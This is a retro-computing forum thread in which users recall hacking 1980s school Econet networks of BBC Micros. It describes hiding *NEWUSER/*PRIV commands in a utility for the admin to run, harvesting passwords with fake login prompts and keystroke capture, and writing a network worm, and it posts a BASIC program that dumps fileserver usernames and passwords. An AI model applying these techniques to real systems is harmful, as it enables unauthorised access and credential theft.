Hacking the school Econet

discussion of beeb/electron applications, languages, utils and educational s/w
User avatar
davidjefferies
Posts: 19
Joined: Thu Jul 14, 2016 2:40 pm
Contact:

Hacking the school Econet

Postby davidjefferies » Mon Feb 19, 2018 1:52 pm

When we were at school my brother reckoned he knew someone at a neighbouring school who was so successful at hacking Econet that the teachers gave up and just let him have the system password. Looking back I'm not sure the story was true but it fascinated me at the time and I spent hours trying to hack our network.

I remember printing out the disassembly of the Econet filing system hoping to find a flaw but was hopelessy out of my depth and gave up after a day or so.

I was eventually successful by writing a handy little utility that the school wanted to put on the fileserver. The program used the BASIC assembler to assemble and save the machine code utility which meant it had to be run by the System user because it needed access to the Utility directory. In the middle of the BASIC part of the program I put two star commands like this

Code: Select all

   *NEWUSER BOB
   *PRIV BOB S

and poked the VDU 20 command into the beginning of the first line to hide those lines when the program was listed.

When the System user ran the program to generate the utility it made a new priviledged user that I was able to login as the next day.

It wasn't exactly foolproof because the lines would have been visible to a *DUMP or similar but it worked like a charm when I tried it.

Anyone else know of alternative ways that the network was hacked BITD?

johnkenyon
Posts: 142
Joined: Wed Jul 20, 2011 2:21 pm
Location: Coventry
Contact:

Re: Hacking the school Econet

Postby johnkenyon » Mon Feb 19, 2018 3:38 pm

My technique was to keep my eyes peeled for one of the two teachers leaving the Network Manager menu program on an unattended computer.
The sequence then went something like.

1) Hit break on the computer logged in with a privileged account.
2) *PRIV <myid> S
3) Hit break again
4) Move to another computer, login, then make the password file readable, take a copy then make it non-readable.
5) Remove the S privilege from <my id>
6) Run some random save commands so that the PRIV command scrolled off the top of the log screen on the file server
7) Run a basic program which decoded the contents of the password file into a text file.

The system administrators used to regularly run a program to list privileged user accounts - hence the need to *UNPRIV as quickly as quickly as possible.

The only other way to hack the system was to sniff the network watching out for a client sending *I AM to the fileserver, and then capturing the packets for a good couple of minutes afterwards looking for the username (if "*I AM :" was used and the password. Given that the L3 file server password file wasn't encrypted, I reckon the username+password data would have been in clear text.
I never did this - would have required some low level 68B54 programming, probably combined with disassembling the NETMON command...

paulb
Posts: 811
Joined: Mon Jan 20, 2014 9:02 pm
Contact:

Re: Hacking the school Econet

Postby paulb » Mon Feb 19, 2018 3:54 pm

davidjefferies wrote:When we were at school my brother reckoned he knew someone at a neighbouring school who was so successful at hacking Econet that the teachers gave up and just let him have the system password. Looking back I'm not sure the story was true but it fascinated me at the time and I spent hours trying to hack our network.


Not undermining what your brother said, here, or the elite hacker skills of his acquaintance, but such reputations are often built on the same kind of thing you get these days with "little Johnny is so good with computers, just look at him!" Of course, the child in question could just be flailing around, but to the "digitally unaware", this can seem like elite skills in action.

As the amusing tales have shown so far in this thread, a lot can be done by subverting the social aspects around technology: getting people to install your code, waiting for people to leave themselves logged in as a privileged user. There was a systems administrator at my university who had a reputation for leaving himself logged in as root, meaning that people learned to check the prompt at the terminal after he'd left the room.

I never had any direct experience with Econet, but I seem to remember that there were those remote procedure calls that acted like a huge backdoor, allowing remote users to call MOS routines. I guess that people might have used those to exploit the weaknesses and gain privileges.

User avatar
BeebMaster
Posts: 2530
Joined: Sun Aug 02, 2009 4:59 pm
Location: Lost in the BeebVault!
Contact:

Re: Hacking the school Econet

Postby BeebMaster » Mon Feb 19, 2018 4:46 pm

I think we have reminisced about this before, but one particular "hack" which has just come to mind was that the key to our school computer room door was the same as someone's garage key, so we could "break in" at times when it was locked when there were no teachers about!
Image

SteveBagley
Posts: 150
Joined: Sun Mar 15, 2015 8:44 pm
Contact:

Re: Hacking the school Econet

Postby SteveBagley » Mon Feb 19, 2018 5:10 pm

paulb wrote:I never had any direct experience with Econet, but I seem to remember that there were those remote procedure calls that acted like a huge backdoor, allowing remote users to call MOS routines. I guess that people might have used those to exploit the weaknesses and gain privileges.


Not to gain privileges -- but I once used the RPC functionality to remotely call OS_ServiceCall with the right values to get VProtect to pop up a dialog box saying the disk was infected with the 'Terminator 2' (I think?) virus as the Head of IT/Maths* popped a floppy in the drive (which would of course then display as clear when scanned :)).

In fact, I'm fairly certain this required chaining two RPCs, since the school was running both Econet and also Lingenuity''s SCSIShare system. The Lingenuity setup was basically a single SCSI HDD connected to six Archimedes, with one shared readonly paritition and a separate writable partition for each machine. There was also software setup to share printing over the network which used a print spooler called !Replay running on one machine and a module called PShareFS that allowed the other machines to access a shared directory on the machine running !Replay to drop the files to be printed into. A friend and I reverse engineered PShareFS and found it also implemented a SWI called PShare_FarSWI that allowed a SWI to be executed on a remote machine.

Anyway, I was on an A5000 connected to the school Econet and so would have needed to drop code onto and A310 connected to both the Econet and the SCSIShare via an Econet RPC that called PShare_FarSWI to reach the 'victim's' machine…

Steve

* Who was also my tutor and so he very quickly realised what was going and who was responsible… :)

User avatar
ctr
Posts: 130
Joined: Wed Jul 16, 2014 2:53 pm
Contact:

Re: Hacking the school Econet

Postby ctr » Mon Feb 19, 2018 7:48 pm

I wrote some code to intercept the command line interpreter vector and told the teacher I needed him to configure something for me, knowing he would use my computer.

When he logged in my code recognised the command, displayed the usual prompt, squirelled away the password, unhooked the vector and displayed the login failed error message. He'd try again, everything would work, and I'd have his password.

User avatar
flaxcottage
Posts: 3025
Joined: Thu Dec 13, 2012 8:46 pm
Location: Derbyshire
Contact:

Re: Hacking the school Econet

Postby flaxcottage » Mon Feb 19, 2018 9:18 pm

One of my students BITD managed to push a piece of software onto my computer via the Econet, which software monitored my keystrokes and echoed them on the student's screen. That way he worked out what the administrator password was.

He then took great delight in telling me what my password was as soon as he found it; at the same time he told me how to run code as part of the boot sequence on the Econet machines to prevent this hack.

This guy was a real genius getting straight As at O-Level and A-Level and a first in Computing at university. He also wrote a routine to smoothly scroll the BBC screen upwards or downwards and as the graphic screen moved out of view a MODE7 screen scrolled into place and vice versa. At the time Acorn said it could not be done. Wish I'd kept that code. :?
- John

Why do I keep collecting Acorn gear? I'm going to need a considerably bigger man-cave. :?

duikkie
Posts: 2830
Joined: Fri Feb 07, 2014 3:28 pm
Contact:

Re: Hacking the school Econet

Postby duikkie » Tue Feb 20, 2018 11:17 am

somewhere on this forum i uploaded a program was it nice programs , i don't know anymore
but i wrote a program to get all usernames and passwords from econet.

as allways with my programs most of them are not finisched :) what i rember that all usernames and passwords where on floppy with second processor as server.

never used econet , but i did work on a school for a half year with econet. and usernames and passwords was developed to be hacked :shock: :D

User avatar
hoglet
Posts: 7062
Joined: Sat Oct 13, 2012 6:21 pm
Location: Bristol
Contact:

Re: Hacking the school Econet

Postby hoglet » Tue Feb 20, 2018 11:37 am

duikkie wrote:somewhere on this forum i uploaded a program was it nice programs , i don't know anymore
but i wrote a program to get all usernames and passwords from econet.

Here?
http://www.stardot.org.uk/forums/viewto ... 175#p90175

Code: Select all

   10 MODE7
   20 PROCinit
   30 PROCtrack
   40 PROCsort
   50 PROCscreen
   60 END
   70 DEFPROCinit
   80 DIM iden$(15),pass$(15),priv$(15)
   90 ENDPROC
  100 DEFPROCtrack
  110 ?&7B00=0:!&7B01=&4000:?&7B05=3:?&7B06=&53:?&7B07=9:?&7B08=7:?&7B09=&21
  120 A%=&7F:X%=&0:Y%=&7B:CALL&FFF1
  130 ENDPROC
  140 DEFPROCsort
  150 FOR I%=1 TO 15
  160 IF ?(&3FEF+I%*17)=0 THEN GOTO 330
  170 C%=0:iden$(I%)=""
  180 REPEAT
  190 B%=?(&3FEF+C%+I%*17)
  200 IF B%=&0D THEN 230
  210 iden$(I%)=iden$(I%)+CHR$(B%)
  220 C%=C%+1
  230 UNTIL C%=10 OR B%=&0D
  240 C%=10:pass$(I%)=""
  250 REPEAT
  260 B%=?(&3FEF+C%+I%*17)
  270 IF B%=0 OR B%=&0D THEN 300
  280 pass$(I%)=pass$(I%)+CHR$(B%)
  290 C%=C%+1
  300 UNTIL C%=16 OR B%=0 OR B%=&0D
  310 priv$(I%)=""
  320 IF ?(&3FEF+16+I%*17)>&80 THEN priv$(I%)="*"
  330 NEXT
  340 ENDPROC
  350 DEFPROCscreen
  360 PRINT:PRINT
  370 PRINTTAB(2);"PASSWORD-CRAKER for econet level 2"
  380 PRINT:PRINTTAB(2);"identifier";TAB(16);"password";TAB(27);"privelege"
  385 PRINT
  390 FOR I%=1 TO 15
  400 PRINTTAB(2);iden$(I%);TAB(16);pass$(I%);TAB(31);priv$(I%)
  420 NEXT
  430 ENDPROC

duikkie
Posts: 2830
Joined: Fri Feb 07, 2014 3:28 pm
Contact:

Re: Hacking the school Econet

Postby duikkie » Tue Feb 20, 2018 12:02 pm

why am i so bad in finding :)

hoglet wrote:
duikkie wrote:somewhere on this forum i uploaded a program was it nice programs , i don't know anymore
but i wrote a program to get all usernames and passwords from econet.

Here?
http://www.stardot.org.uk/forums/viewto ... 175#p90175

Code: Select all

   10 MODE7
   20 PROCinit
   30 PROCtrack
   40 PROCsort
   50 PROCscreen
   60 END
   70 DEFPROCinit
   80 DIM iden$(15),pass$(15),priv$(15)
   90 ENDPROC
  100 DEFPROCtrack
  110 ?&7B00=0:!&7B01=&4000:?&7B05=3:?&7B06=&53:?&7B07=9:?&7B08=7:?&7B09=&21
  120 A%=&7F:X%=&0:Y%=&7B:CALL&FFF1
  130 ENDPROC
  140 DEFPROCsort
  150 FOR I%=1 TO 15
  160 IF ?(&3FEF+I%*17)=0 THEN GOTO 330
  170 C%=0:iden$(I%)=""
  180 REPEAT
  190 B%=?(&3FEF+C%+I%*17)
  200 IF B%=&0D THEN 230
  210 iden$(I%)=iden$(I%)+CHR$(B%)
  220 C%=C%+1
  230 UNTIL C%=10 OR B%=&0D
  240 C%=10:pass$(I%)=""
  250 REPEAT
  260 B%=?(&3FEF+C%+I%*17)
  270 IF B%=0 OR B%=&0D THEN 300
  280 pass$(I%)=pass$(I%)+CHR$(B%)
  290 C%=C%+1
  300 UNTIL C%=16 OR B%=0 OR B%=&0D
  310 priv$(I%)=""
  320 IF ?(&3FEF+16+I%*17)>&80 THEN priv$(I%)="*"
  330 NEXT
  340 ENDPROC
  350 DEFPROCscreen
  360 PRINT:PRINT
  370 PRINTTAB(2);"PASSWORD-CRAKER for econet level 2"
  380 PRINT:PRINTTAB(2);"identifier";TAB(16);"password";TAB(27);"privelege"
  385 PRINT
  390 FOR I%=1 TO 15
  400 PRINTTAB(2);iden$(I%);TAB(16);pass$(I%);TAB(31);priv$(I%)
  420 NEXT
  430 ENDPROC

User avatar
jgharston
Posts: 3022
Joined: Thu Sep 24, 2009 11:22 am
Location: Whitby/Sheffield
Contact:

Re: Hacking the school Econet

Postby jgharston » Tue Feb 20, 2018 1:31 pm

hoglet wrote:
duikkie wrote:somewhere on this forum i uploaded a program was it nice programs , i don't know anymore
but i wrote a program to get all usernames and passwords from econet.

Here?
http://www.stardot.org.uk/forums/viewto ... 175#p90175

But for that to work you need to have already broken the security - you need to have physical access to the physical disk.

Code: Select all

$ bbcbasic
PDP11 BBC BASIC IV Version 0.25
(C) Copyright J.G.Harston 1989,2005-2015
>_

User avatar
davidjefferies
Posts: 19
Joined: Thu Jul 14, 2016 2:40 pm
Contact:

Re: Hacking the school Econet

Postby davidjefferies » Tue Feb 20, 2018 2:14 pm

The only other way to hack the system was to sniff the network watching out for a client sending *I AM to the fileserver, and then capturing the packets for a good couple of minutes afterwards looking for the username (if "*I AM :" was used and the password. Given that the L3 file server password file wasn't encrypted, I reckon the username+password data would have been in clear text.
I never did this - would have required some low level 68B54 programming, probably combined with disassembling the NETMON command...


This was the sort of thing I was thinking about. The Econet Advanced User Guide http://chrisacorns.computinghistory.org ... ncedUG.pdf details the format of the packets sent over the network. I hadn't realised the passwords file was unencrypted, ha, in which case I agree the passwords were almmost certainly sent unencrypted over the network and a utility similar to Netmon would have been able to sniff them out.

One of my students BITD managed to push a piece of software onto my computer via the Econet, which software monitored my keystrokes and echoed them on the student's screen. That way he worked out what the administrator password was.


Looking in the EAUG its amazing (by today's security standards) how much support there is for sending and receiving blocks of memory which would have enabled a keystroke reader. The *View command is doing the same thing but with screen memory. I remember a few little programs from BITD that would cause the characters to fall down the screen etc which presumably used a similar technique.

On a tangent, but reading the entry for *VIEW was the first time I realised that the screen modes on the BBC were organised in decreasing order of memory consumption from 0 to 7. After all the years I can't believe I'd never noticed that :)

Commie_User
Posts: 1066
Joined: Wed Jan 27, 2016 12:50 am
Contact:

Re: Hacking the school Econet

Postby Commie_User » Tue Feb 20, 2018 4:42 pm

I don't know if this counts but all I had to do was hit Break on the RM Nimbus keyboard and I had access to all the BBC programs on the PC network with a *CAT command.

I dropped my own BASIC bits of fun on there and I think they were still there years later when I left school.

crj
Posts: 832
Joined: Thu May 02, 2013 4:58 pm
Contact:

Re: Hacking the school Econet

Postby crj » Wed Feb 21, 2018 7:47 pm

Um.

On the one hand, our staff were pretty knowledgeable. For example, they physically isolated the fileserver and admin workstation from the rest of the Econet before performing management operations, precisely because they knew passwords were in the clear on the wire.

On the other hand, I wrote the membership software for the school computing society. Since members had accounts on the SJ Research file server, this dumped out scripts to create and remove users, which I then had the sysadmin run. They claimed they reviewed the scripts before running them and I'm quite sure they did the first few times. I bet they got careless after a while, though. Conversely, I was trustworthy, so it was all OK. (-8


Meanwhile, there was a small dedicated group of us that took anything and everything apart. We did write a hacked version of NETMON which only looked for *I AM commands. Indeed, we got to the point where we'd taken apart NETMON and NFS enough that we knew in principle how to make a hacked NFS which ran from sideways RAM and silently logged *I AM commands in the background while you were innocently doing something else.

(Incidentally, the "*I AM :" mechanism was entirely client-side. It prompted for the password then sent a normal *I AM command, password included, over the wire.)

But we never bothered deploying that. Far simpler was just to go round a loop peeking &3E0-&3FF from each machine to get their keyboard buffers, including the most recent 32 keystrokes. 32 keystrokes from each machine on the network fitted quite neatly in one MODE 7 display.

A thing I wrote out of morbid curiosity, then hid away because some things belong dead was a hacked NFS which allowed you to change your station number. But I went one step further with *JAM and *UNJAM commands. *JAM would cause a line jam on the Econet, unjamming only when I wanted to send or receive. This meant you hijack another station's file server login and lock them out from interfering with whatever you chose to do.

One of my friends wrote an entertaining utility ROM for the BBC Micro which could molest an Archimedes over the Econet. Particularly, it could hack various video games. If you were feeling nice, a player might suddenly find they had a lot more lives in Zarch; if not, well, they probably didn't really want all that fuel after all.


My nastiest hack, though, was an Econet worm. Every running copy of it repeatedly tried to infect every other computer on the Econet. If you power-cycled a machine, it would get re-infected more quickly than you knew how to prevent. Your only hope was to power cycle with your network lead unplugged and happen to have memorised "A%=19:X%=0:Y%=9:!&900=&FF05:CALL&FFF1" to protect yourself. The only way to completely kill the worm was to switch off every infected computer simultaneously.

Needless to say, I wrote that on a rainy afternoon when the fileserver was down and the room was practically deserted.

Knowing I was playing with fire, I was quite careful to make sure people couldn't get a copy of it. Infection was a two-part process: the payload was obfuscated, and the critical section which infected other computers was garbage you had to EOR with the subsequent JSR immediate operation's argument block. Also, it put important code at &700, so if you protected yourself against JSR but not Poke you'd instantly destroy the payload if you were running BASIC.

Unfortunately, one of my friends used NETMON to see what was going on. With their machine protected, they wrote some code that:
  • Re-enabled Poke
  • Waited a few seconds
  • Disabled Poke
  • Copied &400-&7FF up into higher memory
  • Hacked the JSR entry point to JMP into their code fragment
  • Re-enabled JSR
  • When the hacked JSR entry was called, collected the argument block into higher memory, disabled JSR and did *BASIC
Finally, they had what they needed to reverse-engineer the payload. Frankly, it would have been easier just to write their own worm!

I'd like to think that once they'd had the satisfaction of picking apart my protection they didn't then abuse my worm. Anecdotally, that may not have been the case. )-8

User avatar
jgharston
Posts: 3022
Joined: Thu Sep 24, 2009 11:22 am
Location: Whitby/Sheffield
Contact:

Re: Hacking the school Econet

Postby jgharston » Wed Feb 21, 2018 8:29 pm

I wrote *GRAB and *PUSH which grabbed or pushed a BASIC program, and *KILL and *UNKILL which did what it says on the tin. The latter two taught me to always write the command parsing routines before testing. I'd quickly thrown in a quick hex scan code for testing. Completely forgetting that I'd done that I experimentally tried to *KILL 20 to kill the station next to me. Cue a cry of dispair from the other side of the room as Station 32 crashed!

Code: Select all

$ bbcbasic
PDP11 BBC BASIC IV Version 0.25
(C) Copyright J.G.Harston 1989,2005-2015
>_

User avatar
petercumberland
Posts: 26
Joined: Wed Feb 21, 2018 5:06 pm
Location: UK
Contact:

Re: Hacking the school Econet

Postby petercumberland » Wed Feb 21, 2018 9:26 pm

davidjefferies wrote:When we were at school my brother reckoned he knew someone at a neighbouring school who was so successful at hacking Econet that the teachers gave up and just let him have the system password. Looking back I'm not sure the story was true but it fascinated me at the time and I spent hours trying to hack our network.

I remember printing out the disassembly of the Econet filing system hoping to find a flaw but was hopelessy out of my depth and gave up after a day or so.

I was eventually successful by writing a handy little utility that the school wanted to put on the fileserver. The program used the BASIC assembler to assemble and save the machine code utility which meant it had to be run by the System user because it needed access to the Utility directory. In the middle of the BASIC part of the program I put two star commands like this

Code: Select all

   *NEWUSER BOB
   *PRIV BOB S

and poked the VDU 20 command into the beginning of the first line to hide those lines when the program was listed.

When the System user ran the program to generate the utility it made a new priviledged user that I was able to login as the next day.

It wasn't exactly foolproof because the lines would have been visible to a *DUMP or similar but it worked like a charm when I tried it.

Anyone else know of alternative ways that the network was hacked BITD?


Do you remember the name of the neighbouring school? If it was Raynes Park High School then the story is true!
______________________________________________________________
I am just trying to get to the end of the day without somebody saying at the end of the day